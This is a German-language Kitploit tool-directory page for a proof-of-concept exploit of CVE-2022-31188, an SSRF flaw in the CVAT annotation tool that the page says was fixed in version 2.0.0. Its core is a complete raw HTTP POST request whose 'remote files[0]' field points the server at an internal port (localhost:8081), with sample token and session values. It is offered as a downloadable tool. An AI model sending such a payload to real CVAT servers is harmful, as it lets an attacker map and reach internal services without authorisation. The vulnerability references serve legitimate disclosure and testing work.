Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-31188 — Proof-of-Concept-Exploit für CVE-2022-31188, eine SSRF-Schwachstelle in OpenCV CVAT, die authentifizierten Benutzern mit Task-Erstellungsberechtigungen ermöglicht, interne Netzwerkports zu scannen. | Kitploit
Tools/GitHubGitHub/emirpolatt/cve-2022-31188
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubemirpolatt/cve-2022-31188

CVE-2022-31188

Proof-of-Concept-Exploit für CVE-2022-31188, eine SSRF-Schwachstelle in OpenCV CVAT, die authentifizierten Benutzern mit Task-Erstellungsberechtigungen ermöglicht, interne Netzwerkports zu scannen.

Repository anzeigen
542vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-31188

CVE-2022-31188 - OpenCV CVAT (Computer Vision Annotation Tool) SSRF

CVAT ist ein von Intel entwickeltes Open-Source-Annotationstool für Computer Vision. Jeder Benutzer mit der Berechtigung „Task Create“ kann die SSRF-Schwachstelle auslösen, indem er eine bösartige HTTP-Anfrage sendet und Zugriff auf andere offene Ports des Systems erhält.

Die Schwachstelle wurde mit dem Update auf CVAT 2.0.0 behoben.

root@kitploit:~
POST /api/v1/tasks/2/data HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: application/json, text/plain, */*
Accept-Language:en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 06d88f739a10c7533991d8010761df721b790b7
X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGV
Content-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436
Content-Length: 569
Origin: http://localhost:8080
Connection: close
Referer:http://localhost:8080/tasks/create
Cookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dned
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="remote files[0]"

http://localhost:8081
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name=" image quality"

170
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="use zip chunks"

true
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="use cache"

true
-----------------------------251652214142138553464236533436--

Referenzen

  • https://nvd.nist.gov/vuln/detail/CVE-2022-31188
  • https://github.com/opencv/cvat/security/advisories/GHSA-69qq-p6vh-xjqj

Autor: Emir Polat

Twitter: https://twitter.com/devilsgrins

Tool herunterladen